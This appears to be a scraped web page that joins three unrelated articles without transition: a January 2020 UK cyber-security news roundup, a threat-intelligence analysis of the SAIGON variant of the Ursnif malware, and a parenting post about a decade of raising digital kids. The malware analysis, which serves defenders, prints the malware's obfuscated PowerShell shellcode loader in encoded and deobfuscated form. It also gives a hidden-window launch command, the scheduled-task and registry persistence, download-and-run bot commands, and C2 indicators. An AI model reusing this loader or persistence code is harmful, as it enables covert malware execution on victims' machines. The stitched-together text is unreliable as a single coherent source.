After years of dither and delay the UK government finally nailed its colours to the mast, no not Brexit but Huawei, permitting 'limited use' of the Chinese Telecoms giant's network appliances within the UK's new 5G infrastructure. Whether this is a good decision depends more on individual political persuasion than national security interest, so just like Brexit the general view on the decision is binary, either its a clever compromise or a complete sell out of UK national security. I personally believe the decision is more about national economics than national security, as I previously blogged in 'The UK Government Huawei Dilemma and the Brexit Factor'. The UK government is playing a delicate balancing to safeguard potentially massive trade deals with both of the world's largest economic superpowers, China and United States. An outright US style ban Huawei would seriously jeopardise billions of pounds worth of Chinese investment into the UK economy. While on the security front, Huawei's role will be restricted to protect the UK's critical national infrastructure, with Huawei's equipment banned from use within the core of the 5G infrastructure. The UK National Cyber Security Centre (NCSC) published a document which provides guidance to high risk network providers on the use of Huawei tech.
UK Gov agrees to 'limited' Huawei involvement within UK 5G

UK business targeted ransomware continues to rear its ugly head in 2020, this time global foreign exchange firm Travelex's operations were all brought to a shuddering halt after a major ransomware attack took down Travelex's IT systems. Travelex services impacted included their UK business, international websites, mobile apps, and white-labelled services for the likes of Tesco, Sainsburys, Virgin Money, Barclays and RBS. The ransomware in question was named as Sodinokibi, with numerous media reports strongly suggesting the Sodinokibi ransomware infiltrated the Travelex network through unpatched vulnerable Pulse Secure VPN servers, which the National Cyber Security Centre had apparently previously detected and warned Travelex about many months earlier. Could be some truth in this, given the Sodinokibi ransomware is known to infect through remote access systems, including vulnerable Pulse Secure VPN servers. The cybercriminal group behind the attack, also known as Sodin and REvil, demanded £4.6 million in ransom payment, and had also claimed to have taken 5Gb of Travelex customer data. Travelex reported no customer data had been breached, however, its money exchange services remained offline for well over two weeks after reporting the incident, with the firm advising it expected most of its travel exchange services to be back operational by the end of January.

The same Sodinokibi criminal group behind the Travelex attack also claimed responsibility for what was described by German automotive parts supplier Gedia Automotive Group, as a 'massive cyber attack'. Gedia said it would take weeks to months before its IT systems were up and running as normal. According to analysis by US cyber security firm Bad Packets, the German firm also had an unpatched Pulse Secure VPN server on its network perimeter which left it exposed to the ransomware attack. Gedia patched their server VPN on 4th January.

Leeds based medical tech company Tissue Regenix halted its US manufacturing operation after unauthorised party accessed its IT systems. To date there hasn't been any details about the nature of this cyber attack, but a manufacturing shutdown is a hallmark of a mass ransomware infection. Reuters reported shares in the company dropped 22% following their cyber attack disclosure.

London based marine consultancy company LOC was hacked and held to be ransom by cybercriminals. It was reported computers were 'locked' and 300Gb of company data were stolen by a criminal group, investigations on this hack are still ongoing.

Its seem every month I report a massive data breach due to the misconfiguration of a cloud server, but I never expected one of leading global cloud providers, Microsoft, to be caught out by such a school boy error. Microsoft reported a database misconfiguration of their Elasticsearch servers exposed 250 million customer support records between 5th and 19th December 2019. Some of the non-redacted data exposed included customer email addresses; IP addresses; locations; descriptions of customer support claims and cases; Microsoft support agent emails; case numbers, resolutions and remarks; and confidential internal notes. It is not known if any unauthorised parties had accessed any of the leaked data.

Cyber attacks against the UK defence industry hit unprecedented highs according government documentation obtained by Sky News. Sky News revealed the MoD and its partners failed to protect military and defence data in 37 incidents in 2017 and 34 incidents in first 10 months of 2018, with military data exposed to nation-level cyber actors on dozens of occasions.

It was another fairly busy month for Microsoft patches, including an NSA revealed critical flaw in Windows 10. January also saw the end of security updates support for Windows 7 and Windows Server 2008, unless you pay Microsoft extra for extended support.

According to a World Economic Forum (WEF) study, most of the world's airports cybersecurity is not up to scratch. WEF reported 97 of the world’s 100 largest airports have vulnerable web and mobile applications, misconfigured public cloud and dark web leaks. Findings summary were:

  • 97% of the websites contain outdated web software.
  • 24% of the websites contain known and exploitable vulnerabilities.
  • 76% and 73% of the websites are not compliant with GDPR and PCI DSS, respectively.
  • 100% of the mobile apps contain at least five external software frameworks.
  • 100% of the mobile apps contain at least two vulnerabilities.
Elsewhere in the world, it was reported a US Department of Defence contractor had its web servers (and thus its websites) taken down by the Ryuk ransomware. Houston-based steakhouse Landry advised it was hit by a point-of-sale malware attack which stole customer payment card data. Stolen customer payment card data taken from a Pennsylvania-based convenience store and petrol station operator was found for sale online. Ahead of the Superbowl LIV Twitter and Facebook accounts for 15 NFL teams were hacked. The hacking group OurMine took responsibility for the NFL franchise attacks, which said it was to demonstrate internet security was "still low" and had to be improved upon. Sonos apologised after accidentally revealing hundreds of customer email addresses to each other. And a ransomware took a US Maritime base offline for 30 hours.

Dallas County Attorney finally applied some common-sense, dropping charges against two Coalfire Red Teamers. The two Coalfire employees had been arrested on 11th September 2019 while conducting a physical penetration test of the Dallas County courthouse. The Perry News quoted a police report which said upon arrest the two men stated, “they were contracted to break into the building for Iowa courts to check the security of the building". After the charges were dropped at the end of January Coalfire CEO Tom McAndrew said, 'With positive lessons learned, a new dialogue now begins with a focus on improving best practices and elevating the alignment between security professionals and law enforcement”. Adding “We’re grateful to the global security community for their support throughout this experience.”


BLOG
NEWS
VULNERABILITIES AND SECURITY UPDATES
AWARENESS, EDUCATION AND THREAT INTELLIGENCE

SAIGON, the Mysterious Ursnif Fork

Ursnif (aka Gozi/Gozi-ISFB) is one of the oldest banking malware families still in active distribution. While the first major version of Ursnif was identified in 2006, several subsequent versions have been released in large part due source code leaks. FireEye reported on a previously unidentified variant of the Ursnif malware family to our threat intelligence subscribers in September 2019 after identification of a server that hosted a collection of tools, which included multiple point-of-sale malware families. This malware self-identified as "SaiGon version 3.50 rev 132," and our analysis suggests it is likely based on the source code of the v3 (RM3) variant of Ursnif. Notably, rather than being a full-fledged banking malware, SAIGON's capabilities suggest it is a more generic backdoor, perhaps tailored for use in targeted cybercrime operations.

Technical Analysis

Behavior

SAIGON appears on an infected computer as a Base64-encoded shellcode blob stored in a registry key, which is launched using PowerShell via a scheduled task. As with other Ursnif variants, the main component of the malware is a DLL file. This DLL has a single exported function, DllRegisterServer, which is an unused empty function. All the relevant functionality of the malware executes when the DLL is loaded and initialized via its entry point.

Upon initial execution, the malware generates a machine ID using the creation timestamp of either %SystemDrive%\pagefile.sys or %SystemDrive%\hiberfil.sys (whichever is identified first). Interestingly, the system drive is queried in a somewhat uncommon way, directly from the KUSER_SHARED_DATA structure (via SharedUserData→NtSystemRoot). KUSER_SHARED_DATA is a structure located in a special part of kernel memory that is mapped into the memory space of all user-mode processes (thus shared), and always located at a fixed memory address (0x7ffe0000, pointed to by the SharedUserData symbol).

The code then looks for the current shell process by using a call to GetWindowThreadProcessId(GetShellWindow(), …). The code also features a special check; if the checksum calculated from the name of the shell's parent process matches the checksum of explorer.exe (0xc3c07cf0), it will attempt to inject into the parent process instead.

SAIGON then injects into this process using the classic VirtualAllocEx / WriteProcessMemory / CreateRemoteThread combination of functions. Once this process is injected, it loads two embedded files from within its binary:

  • A PUBLIC.KEY file, which is used to verify and decrypt other embedded files and data coming from the malware's command and control (C2) server
  • A RUN.PS1 file, which is a PowerShell loader script template that contains a "@SOURCE@" placeholder within the script:

$hanksefksgu = [System.Convert]::FromBase64String("@SOURCE@");
Invoke-Expression ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("JHdneG1qZ2J4dGo9JGh
hbmtzZWZrc2d1Lkxlbmd0aDskdHNrdm89IltEbGxJbXBvcnQoYCJrZXJuZWwzMmAiKV1gbnB1YmxpYyBzdGF
0aWMgZXh0ZXJuIEludDMyIEdldEN1cnJlbnRQcm9jZXNzKCk7YG5bRGxsSW1wb3J0KGAidXNlcjMyYCIpXWB
ucHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIEdldERDKEludFB0ciBteHhhaHhvZik7YG5bRGxsSW1wb3J0K
GAia2VybmVsMzJgIildYG5wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgQ3JlYXRlUmVtb3RlVGhyZWFkKEl
udFB0ciBoY3d5bHJicywgSW50UHRyIHdxZXIsdWludCBzZmosSW50UHRyIHdsbGV2LEludFB0ciB3d2RyaWN
0d2RrLHVpbnQga2xtaG5zayxJbnRQdHIgdmNleHN1YWx3aGgpO2BuW0RsbEltcG9ydChgImtlcm5lbDMyYCI
pXWBucHVibGljIHN0YXRpYyBleHRlcm4gVUludDMyIFdhaXRGb3JTaW5nbGVPYmplY3QoSW50UHRyIGFqLC
BVSW50MzIga2R4c3hldik7YG5bRGxsSW1wb3J0KGAia2VybmVsMzJgIildYG5wdWJsaWMgc3RhdGljIGV4dG
VybiBJbnRQdHIgVmlydHVhbEFsbG9jKEludFB0ciB4eSx1aW50IGtuYnQsdWludCB0bXJ5d2h1LHVpbnQgd2d1
dHVkKTsiOyR0c2thYXhvdHhlPUFkZC1UeXBlIC1tZW1iZXJEZWZpbml0aW9uICR0c2t2byAtTmFtZSAnV2luMzI
nIC1uYW1lc3BhY2UgV2luMzJGdW5jdGlvbnMgLXBhc3N0aHJ1OyRtaHhrcHVsbD0kdHNrYWF4b3R4ZTo6Vml
ydHVhbEFsbG9jKDAsJHdneG1qZ2J4dGosMHgzMDAwLDB4NDApO1tTeXN0ZW0uUnVudGltZS5JbnRlcm9wU
2VydmljZXMuTWFyc2hhbF06OkNvcHkoJGhhbmtzZWZrc2d1LDAsJG1oeGtwdWxsLCR3Z3htamdieHRqKTskd
GRvY25ud2t2b3E9JHRza2FheG90eGU6OkNyZWF0ZVJlbW90ZVRocmVhZCgtMSwwLDAsJG1oeGtwdWxsLC
RtaHhrcHVsbCwwLDApOyRvY3h4am1oaXltPSR0c2thYXhvdHhlOjpXYWl0Rm9yU2luZ2xlT2JqZWN0KCR0ZG
9jbm53a3ZvcSwzMDAwMCk7")));

The malware replaces the "@SOURCE@" placeholder from this PowerShell script template with a Base64-encoded version of itself, and writes the PowerShell script to a registry value named "PsRun" under the "HKEY_CURRENT_USER\Identities\{<random_guid>}" registry key (Figure 1).


Figure 1: PowerShell script written to PsRun

The instance of SAIGON then creates a new scheduled task (Figure 2) with the name "Power<random_word>" (e.g. PowerSgs). If this is unsuccessful for any reason, it falls back to using the "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" registry key to enable itself to maintain persistence through system reboot.


Figure 2: Scheduled task

Regardless of the persistence mechanism used, the command that executes the binary from the registry is similar to the following:

PowerShell.exe -windowstyle hidden -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwASQBkAGUAbgB0AGkAdABpAGUAcwBcAHsANAAzAEIA
OQA1AEUANQBCAC0ARAAyADEAOAAtADAAQQBCADgALQA1AEQANwBGAC0AMgBDADcAOAA5AEMANQA5
AEIAMQBEAEYAfQAnACkALgBQAHMAUgB1AG4A

After removing the Base64 encoding from this command, it looks something like "iex (gp 'HKCU:\\Identities\\{43B95E5B-D218-0AB8-5D7F-2C789C59B1DF}').PsRun."  When executed, this command retrieves the contents of the previous registry value using Get-ItemProperty (gp) and executes it using Invoke-Expression (iex).

Finally, the PowerShell code in the registry allocates a block of memory, copies the Base64-decoded shellcode blob into it, launches a new thread pointing to the area using CreateRemoteThread, and waits for the thread to complete. The following script is a deobfuscated and beautified version of the PowerShell.

$hanksefksgu = [System.Convert]::FromBase64String("@SOURCE@");
$wgxmjgbxtj = $hanksefksgu.Length;

$tskvo = @"
[DllImport("kernel32")]
public static extern Int32 GetCurrentProcess();

[DllImport("user32")]
public static extern IntPtr GetDC(IntPtr mxxahxof);

[DllImport("kernel32")]
public static extern IntPtr CreateRemoteThread(IntPtr hcwylrbs, IntPtr wqer, uint sfj, IntPtr wllev, IntPtr wwdrictwdk, uint klmhnsk, IntPtr vcexsualwhh);

[DllImport("kernel32")]
public static extern UInt32 WaitForSingleObject(IntPtr aj, UInt32 kdxsxev);

[DllImport("kernel32")]
public static extern IntPtr VirtualAlloc(IntPtr xy, uint knbt, uint tmrywhu, uint wgutud);
"@;

$tskaaxotxe = Add-Type -memberDefinition $tskvo -Name 'Win32' -namespace Win32Functions -passthru;
$mhxkpull = $tskaaxotxe::VirtualAlloc(0, $wgxmjgbxtj, 0x3000, 0x40);[System.Runtime.InteropServices.Marshal]::Copy($hanksefksgu, 0, $mhxkpull, $wgxmjgbxtj);
$tdocnnwkvoq = $tskaaxotxe::CreateRemoteThread(-1, 0, 0, $mhxkpull, $mhxkpull, 0, 0);
$ocxxjmhiym = $tskaaxotxe::WaitForSingleObject($tdocnnwkvoq, 30000);

Once it has established a foothold on the machine, SAIGON loads and parses its embedded LOADER.INI configuration (see the Configuration section for details) and starts its main worker thread, which continuously polls the C2 server for commands.

Configuration

The Ursnif source code incorporated a concept referred to as "joined data," which is a set of compressed/encrypted files bundled with the executable file. Early variants relied on a special structure after the PE header and marked with specific magic bytes ("JF," "FJ," "J1," "JJ," depending on the Ursnif version). In Ursnif v3 (Figure 3), this data is no longer simply after the PE header but pointed to by the Security Directory in the PE header, and the magic bytes have also been changed to "WD" (0x4457).


Figure 3: Ursnif v3 joined data

This structure defines the various properties (offset, size, and type) of the bundled files. This is the same exact method used by SAIGON for storing its three embedded files:

  • PUBLIC.KEY - RSA public key
  • RUN.PS1 - PowerShell script template
  • LOADER.INI - Malware configuration

The following is a list of configuration options observed:

Name Checksum

Name

Description

0x97ccd204

HostsList

List of C2 URLs used for communication

0xd82bcb60

ServerKey

Serpent key used for communicating with the C2

0x23a02904

Group

Botnet ID

0x776c71c0

IdlePeriod

Number of seconds to wait before the initial request to the C2

0x22aa2818

MinimumUptime

Waits until the uptime is greater than this value (in seconds)

0x5beb543e

LoadPeriod

Number of seconds to wait between subsequent requests to the C2

0x84485ef2

HostKeepTime

The number of minutes to wait before switching to the next C2 server in case of failures

Table 1: Configuration options

Communication

While the network communication structure of SAIGON is very similar to Ursnif v3, there are some subtle differences. SAIGON beacons are sent to the C2 servers as multipart/form-data encoded requests via HTTP POST to the "/index.html" URL path. The payload to be sent is first encrypted using Serpent encryption (in ECB mode vs CBC mode), then Base64-encoded. Responses from the server are encrypted with the same Serpent key and signed with the server's RSA private key.

SAIGON uses the following User-Agent header in its HTTP requests: "Mozilla/5.0 (Windows NT <os_version>; rv:58.0) Gecko/20100101 Firefox/58.0," where <os_version> consists of the operating system's major and minor version number (e.g. 10.0 on Windows 10, and 6.1 on Windows 7) and the string "; Win64; x64" is appended when the operating system is 64-bit. This yields the following example User Agent strings:

  • "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0" on Windows 10 64-bit
  • "Mozilla/5.0 (Windows NT 6.1; rv:58.0) Gecko/20100101 Firefox/58.0" on Windows 7 32-bit

The request format is also somewhat similar to the one used by other Ursnif variants described in Table 2:

ver=%u&group=%u&id=%08x%08x%08x%08x&type=%u&uptime=%u&knock=%u

Name

Description

ver

Bot version (unlike other Ursnif variants this only contains the build number, so only the xxx digits from "3.5.xxx")

group

Botnet ID

id

Client ID

type

Request type (0 – when polling for tasks, 6 – for system info data uploads)

uptime

Machine uptime in seconds

knock

The bot "knock" period (number of seconds to wait between subsequent requests to the C2, see the LoadPeriod configuration option)

Table 2: Request format components

Capabilities

SAIGON implements the bot commands described in Table 3.

Name Checksum

Name

Description

0x45d4bf54

SELF_DELETE

Uninstalls itself from the machine; removes scheduled task and deletes its registry key

0xd86c3bdc

LOAD_UPDATE

Download data from URL, decrypt and verify signature, save it as a .ps1 file and run it using "PowerShell.exe -ep unrestricted -file %s"

0xeac44e42

GET_SYSINFO

Collects and uploads system information by running:

  1. "systeminfo.exe"
  2. "net view"
  3. "nslookup 127.0.0.1"
  4. "tasklist.exe /SVC"
  5. "driverquery.exe"
  6. "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s"

0x83bf8ea0

LOAD_DLL

Download data from URL, decrypt and verify, then use the same shellcode loader that was used to load itself into memory to load the DLL into the current process

0xa8e78c43

LOAD_EXE

Download data from URL, decrypt and verify, save with an .exe extension, invoke using ShellExecute

Table 3: SAIGON bot commands

Comparison to Ursnif v3

Table 4 shows the similarities between Ursnif v3 and the analyzed SAIGON samples (differences are highlighted in bold):

 

Ursnif v3 (RM3)

Saigon (Ursnif v3.5?)

Persistence method

Scheduled task that executes code stored in a registry key using PowerShell

Scheduled task that executes code stored in a registry key using PowerShell

Configuration storage

Security PE directory points to embedded binary data starting with 'WD' magic bytes (aka. Ursnif "joined files")

Security PE directory points to embedded binary data starting with 'WD' magic bytes (aka. Ursnif "joined files")

PRNG algorithm

xorshift64*

xorshift64*

Checksum algorithm

JAMCRC (aka. CRC32 with all the bits flipped)

CRC32, with the result rotated to the right by 1 bit

Data compression

aPLib

aPLib

Encryption/Decryption

Serpent CBC

Serpent ECB

Data integrity verification

RSA signature

RSA signature

Communication method

HTTP POST requests

HTTP POST requests

Payload encoding

Unpadded Base64 ('+' and '/' are replaced with '_2B' and '_2F' respectively), random slashes are added

Unpadded Base64 ('+' and '/' are replaced with '%2B' and '%2F' respectively), no random slashes

Uses URL path mimicking?

Yes

No

Uses PX file format?

Yes

No

Table 4: Similarities and differences between Ursnif v3 and SAIGON samples

Figure 4 shows Ursnif v3's use of URL path mimicking. This tactic has not been seen in other Ursnif variants, including SAIGON.


Figure 4: Ursnif v3 mimicking (red) previously seen benign browser traffic (green) not seen in SAIGON samples 

Implications

It is currently unclear whether SAIGON is representative of a broader evolution in the Ursnif malware ecosystem. The low number of SAIGON samples identified thus far—all of which have compilations timestamps in 2018—may suggest that SAIGON was a temporary branch of Ursnif v3 adapted for use in a small number of operations. Notably, SAIGON’s capabilities also distinguish it from typical banking malware and may be more suited toward supporting targeted intrusion operations. This is further supported via our prior identification of SAIGON on a server that hosted tools used in point-of-sale intrusion operations as well as VISA’s recent notification of the malware appearing on a compromised hospitality organization’s network along with tools previously used by FIN8.

Acknowledgements

The authors would like to thank Kimberly Goody, Jeremy Kennelly and James Wyke for their support on this blog post.

Appendix A: Samples

The following is a list of samples including their embedded configuration:

Sample SHA256: 8ded07a67e779b3d67f362a9591cce225a7198d2b86ec28bbc3e4ee9249da8a5
Sample Version: 3.50.132
PE Timestamp: 2018-07-07T14:51:30
XOR Cookie: 0x40d822d9
C2 URLs:

  • https://google-download[.]com
  • https://cdn-google-eu[.]com
  • https://cdn-gmail-us[.]com

Group / Botnet ID: 1001
Server Key: rvXxkdL5DqOzIRfh
Idle Period: 30
Load Period: 300
Host Keep Time: 1440
RSA Public Key: (0xd2185e9f2a77f781526f99baf95dff7974e15feb4b7c7a025116dec10aec8b38c808f5f0bb21ae575672b1502ccb5c
021c565359255265e0ca015290112f3b6cb72c7863309480f749e38b7d955e410cb53fb3ecf7c403f593518a2cf4915
d0ff70c3a536de8dd5d39a633ffef644b0b4286ba12273d252bbac47e10a9d3d059, 0x10001)

Sample SHA256: c6a27a07368abc2b56ea78863f77f996ef4104692d7e8f80c016a62195a02af6
Sample Version: 3.50.132
PE Timestamp: 2018-07-07T14:51:41
XOR Cookie: 0x40d822d9
C2 URLs:

  • https://google-download[.]com
  • https://cdn-google-eu[.]com
  • https://cdn-gmail-us[.]com

Group / Botnet ID: 1001
Server Key: rvXxkdL5DqOzIRfh
Idle Period: 30
Load Period: 300
Host Keep Time: 1440
RSA Public Key: (0xd2185e9f2a77f781526f99baf95dff7974e15feb4b7c7a025116dec10aec8b38c808f5f0bb21ae575672b1502ccb5c
021c565359255265e0ca015290112f3b6cb72c7863309480f749e38b7d955e410cb53fb3ecf7c403f593518a2cf4915
d0ff70c3a536de8dd5d39a633ffef644b0b4286ba12273d252bbac47e10a9d3d059, 0x10001)

Sample SHA256: 431f83b1af8ab7754615adaef11f1d10201edfef4fc525811c2fcda7605b5f2e
Sample Version: 3.50.199
PE Timestamp: 2018-11-15T11:17:09
XOR Cookie: 0x40d822d9
C2 URLs:

  • https://mozilla-yahoo[.]com
  • https://cdn-mozilla-sn45[.]com
  • https://cdn-digicert-i31[.]com

Group / Botnet ID: 1000
Server Key: rvXxkdL5DqOzIRfh
Idle Period: 60
Load Period: 300
Host Keep Time: 1440
RSA Public Key: (0xd2185e9f2a77f781526f99baf95dff7974e15feb4b7c7a025116dec10aec8b38c808f5f0bb21ae575672b15
02ccb5c021c565359255265e0ca015290112f3b6cb72c7863309480f749e38b7d955e410cb53fb3ecf7c403f5
93518a2cf4915d0ff70c3a536de8dd5d39a633ffef644b0b4286ba12273d252bbac47e10a9d3d059, 0x10001)

Sample SHA256: 628cad1433ba2573f5d9fdc6d6ac2c7bd49a8def34e077dbbbffe31fb6b81dc9
Sample Version: 3.50.209
PE Timestamp: 2018-12-04T10:47:56
XOR Cookie: 0x40d822d9
C2 URLs

  • http://softcloudstore[.]com
  • http://146.0.72.76
  • http://setworldtime[.]com
  • https://securecloudbase[.]com

Botnet ID: 1000
Server Key: 0123456789ABCDEF
Idle Period: 20
Minimum Uptime: 300
Load Period: 1800
Host Keep Time: 360
RSA Public Key: (0xdb7c3a9ea68fbaf5ba1aebc782be3a9e75b92e677a114b52840d2bbafa8ca49da40a64664d80cd62d9453
34f8457815dd6e75cffa5ee33ae486cb6ea1ddb88411d97d5937ba597e5c430a60eac882d8207618d14b660
70ee8137b4beb8ecf348ef247ddbd23f9b375bb64017a5607cb3849dc9b7a17d110ea613dc51e9d2aded, 0x10001)

Appendix B: IOCs

Sample hashes:

  • 8ded07a67e779b3d67f362a9591cce225a7198d2b86ec28bbc3e4ee9249da8a5
  • c6a27a07368abc2b56ea78863f77f996ef4104692d7e8f80c016a62195a02af6
  • 431f83b1af8ab7754615adaef11f1d10201edfef4fc525811c2fcda7605b5f2e [VT]
  • 628cad1433ba2573f5d9fdc6d6ac2c7bd49a8def34e077dbbbffe31fb6b81dc9 [VT]

C2 servers:

  • https://google-download[.]com
  • https://cdn-google-eu[.]com
  • https://cdn-gmail-us[.]com
  • https://mozilla-yahoo[.]com
  • https://cdn-mozilla-sn45[.]com
  • https://cdn-digicert-i31[.]com
  • http://softcloudstore[.]com
  • http://146.0.72.76
  • http://setworldtime[.]com
  • https://securecloudbase[.]com

User-Agent:

  • "Mozilla/5.0 (Windows NT <os_version>; rv:58.0) Gecko/20100101 Firefox/58.0"

Other host-based indicators:

  • "Power<random_string>" scheduled task
  • "PsRun" value under the HKCU\Identities\{<random_guid>} registry key

Appendix C: Shellcode Converter Script

The following Python script is intended to ease analysis of this malware. This script converts the SAIGON shellcode blob back into its original DLL form by removing the PE loader and restoring its PE header. These changes make the analysis of SAIGON shellcode blobs much simpler (e.g. allow loading of the files in IDA), however, the created DLLs will still crash when run in a debugger as the malware still relies on its (now removed) PE loader during the process injection stage of its execution. After this conversion process, the sample is relatively easy to analyze due to its small size and because it is not obfuscated.

#!/usr/bin/env python3
import argparse
import struct
from datetime import datetime

MZ_HEADER = bytes.fromhex(
    '4d5a90000300000004000000ffff0000'
    'b8000000000000004000000000000000'
    '00000000000000000000000000000000'
    '00000000000000000000000080000000'
    '0e1fba0e00b409cd21b8014ccd215468'
    '69732070726f6772616d2063616e6e6f'
    '742062652072756e20696e20444f5320'
    '6d6f64652e0d0d0a2400000000000000'
)

def main():
    parser = argparse.ArgumentParser(description="Shellcode to PE converter for the Saigon malware family.")
    parser.add_argument("sample")
    args = parser.parse_args()

    with open(args.sample, "rb") as f:
        data = bytearray(f.read())

    if data.startswith(b'MZ'):
        lfanew = struct.unpack_from('=I', data, 0x3c)[0]
        print('This is already an MZ/PE file.')
        return
    elif not data.startswith(b'\xe9'):
        print('Unknown file type.')
        return

    struct.pack_into('=I', data, 0, 0x00004550)
    if data[5] == 0x01:
        struct.pack_into('=H', data, 4, 0x14c)
    elif data[5] == 0x86:
        struct.pack_into('=H', data, 4, 0x8664)
    else:
        print('Unknown architecture.')
        return

    # file alignment
    struct.pack_into('=I', data, 0x3c, 0x200)

    optional_header_size, _ = struct.unpack_from('=HH', data, 0x14)
    magic, _, _, size_of_code = struct.unpack_from('=HBBI', data, 0x18)
    print('Magic:', hex(magic))
    print('Size of code:', hex(size_of_code))

    base_of_code, base_of_data = struct.unpack_from('=II', data, 0x2c)

    if magic == 0x20b:
        # base of data, does not exist in PE32+
        if size_of_code & 0x0fff:
            tmp = (size_of_code & 0xfffff000) + 0x1000
        else:
            tmp = size_of_code
        base_of_data = base_of_code + tmp

    print('Base of code:', hex(base_of_code))
    print('Base of data:', hex(base_of_data))

    data[0x18 + optional_header_size : 0x1000] = b'\0' * (0x1000 - 0x18 - optional_header_size)

    size_of_header = struct.unpack_from('=I', data, 0x54)[0]

    data_size = 0x3000
    pos = data.find(struct.pack('=IIIII', 3, 5, 7, 11, 13))
    if pos >= 0:
        data_size = pos - base_of_data

    section = 0
    struct.pack_into('=8sIIIIIIHHI', data, 0x18 + optional_header_size + 0x28 * section,
        b'.text',
        size_of_code, base_of_code,
        base_of_data - base_of_code, size_of_header,
        0, 0,
        0, 0,
        0x60000020
    )
    section += 1
    struct.pack_into('=8sIIIIIIHHI', data, 0x18 + optional_header_size + 0x28 * section,
        b'.rdata',
        data_size, base_of_data,
        data_size, size_of_header + base_of_data - base_of_code,
        0, 0,
        0, 0,
        0x40000040
    )
    section += 1
    struct.pack_into('=8sIIIIIIHHI', data, 0x18 + optional_header_size + 0x28 * section,
        b'.data',
        0x1000, base_of_data + data_size,
        0x1000, size_of_header + base_of_data - base_of_code + data_size,
        0, 0,
        0, 0,
        0xc0000040
    )

    if magic == 0x20b:
        section += 1
        struct.pack_into('=8sIIIIIIHHI', data, 0x18 + optional_header_size + 0x28 * section,
            b'.pdata',
            0x1000, base_of_data + data_size + 0x1000,
            0x1000, size_of_header + base_of_data - base_of_code + data_size + 0x1000,
            0, 0,
            0, 0,
            0x40000040
        )
        section += 1
        struct.pack_into('=8sIIIIIIHHI', data, 0x18 + optional_header_size + 0x28 * section,
            b'.bss',
            0x1600, base_of_data + data_size + 0x2000,
            len(data[base_of_data + data_size + 0x2000:]), size_of_header + base_of_data - base_of_code + data_size + 0x2000,
            0, 0,
            0, 0,
            0xc0000040
        )
    else:
        section += 1
        struct.pack_into('=8sIIIIIIHHI', data, 0x18 + optional_header_size + 0x28 * section,
            b'.bss',
            0x1000, base_of_data + data_size + 0x1000,
            0x1000, size_of_header + base_of_data - base_of_code + data_size + 0x1000,
            0, 0,
            0, 0,
            0xc0000040
        )
        section += 1
        struct.pack_into('=8sIIIIIIHHI', data, 0x18 + optional_header_size + 0x28 * section,
            b'.reloc',
            0x2000, base_of_data + data_size + 0x2000,
            len(data[base_of_data + data_size + 0x2000:]), size_of_header + base_of_data - base_of_code + data_size + 0x2000,
            0, 0,
            0, 0,
            0x40000040
        )

    header = MZ_HEADER + data[:size_of_header - len(MZ_HEADER)]
    pe = bytearray(header + data[0x1000:])
    with open(args.sample + '.dll', 'wb') as f:
        f.write(pe)

    lfanew = struct.unpack_from('=I', pe, 0x3c)[0]
    timestamp = struct.unpack_from('=I', pe, lfanew + 8)[0]
    print('PE timestamp:', datetime.utcfromtimestamp(timestamp).isoformat())

 

if __name__ == "__main__":
    main()

Lessons Learned: A Decade of Digital Parenting

digital parenting

Give yourself a high-five, parents. Pour yourself a cup of coffee or your favorite celebratory drink and sip it slow — real slow. Savor the wins. Let go of the misses. Appreciate the lessons learned. You’ve come a long way in the last decade of raising digital kids, and not all of it has been easy.

As we head into 2020, we’re tossing parenting resolutions (hey, it’s a victory to make it through a week let alone a year!). Instead, we’re looking back over the digital terrain we’ve traveled together and lessons learned. Need a refresher? Here’s a glimpse of how technology has impacted the family over the past decade.

In the last decade

• Smartphone, social, gaming growth. Social media and gaming platforms have exploded to usage and influence levels no one could have imagined. Smartphone ownership has increased and as of 2019: 81% of adults own a smartphone and 72% use social media, 53% of kids own a smartphone by the age of 11, and 84 % of teenagers have phones.

• Video platform growth. Video platforms like YouTube have become the go-to for teens and tweens who spend nearly three hours a day watching videos online.

• Streaming news. Smartphones have made it possible for all of us to carry (and stream) the world in our pockets. In 2018, for the first time, social media sites surpassed print newspapers as a news source for Americans.

• Dating apps dominate. We’re hooking up, dating, and marrying using apps. A Stanford study found that “heterosexual couples are more likely to meet a romantic partner online than through personal contacts and connections.”

• The rise of the Influencer. Internet influencers and celebrities have reached epic levels of fame, wealth, and reach, creating an entire industry of vloggers, gamers, micro and niche-influencers, and others who have become “instafamous.”

• Lexicon changes. Every day, technology is adding terms to our lexicon that didn’t exist a decade ago such as selfie, OMG, streaming, bae, fake news, the cloud, wearables, finsta, influencers, emojis, tracking apps, catfish, digital shaming, screen time, cryptojacking, FOMO, and hashtag, along with hundreds of others.

What we’ve learned (often the hard way)

Most people, if polled, would say technology has improved daily life in incalculable ways. But ask a parent of a child between five and 18 the same question, and the response may not be as enthusiastic. Here are some lessons we’ve learned the hard way.

Connection brings risk. We’ve learned that with unprecedented connection comes equally unprecedented risk. Everyday devices plug our kids directly into the potential for cyberbullying, sexting, inappropriate content, and mental health issues.  Over the past decade, parents, schools, and leaders have worked to address these risks head-on but we have a long way to go in changing the online space into an emotionally safe and healthy place.

Tech addiction isn’t a myth.  To curb the negative impact of increased tech use, we’ve learned ways to balance and limit screen time, unplug, and digitally detox. Most importantly, it’s been confirmed that technology addiction is a medical condition that’s impacting people and families in very painful ways.

The internet remembers. We’ve witnessed the very public consequences of bad digital choices. Kids and adults have wrecked scholarships, reputations, and careers due to careless words or content shared online. Because of these cases, we’re learning — though never fast enough — to think twice about the behaviors and words we share.

We’re equipping vs. protecting. We’ve gone from monitoring our kids aggressively and freaking out over headlines to realizing that we can’t put the internet in a bottle and follow our kids 24/7. We’ve learned that relevant, consistent conversation, adding an extra layer of protection with security software, and taking the time to understand (not just monitor) the ways our kids use new apps, is the best way to equip them for digital life.

The parent-child relationship is #1. When it comes to raising savvy digital kids and keeping them safe, there’s not a monitoring plan in existence that rivals a strong parent-child relationship. If you’ve earned your child’s heart, mind, and respect, you have his or her attention and can equip them daily to make wise choices online.

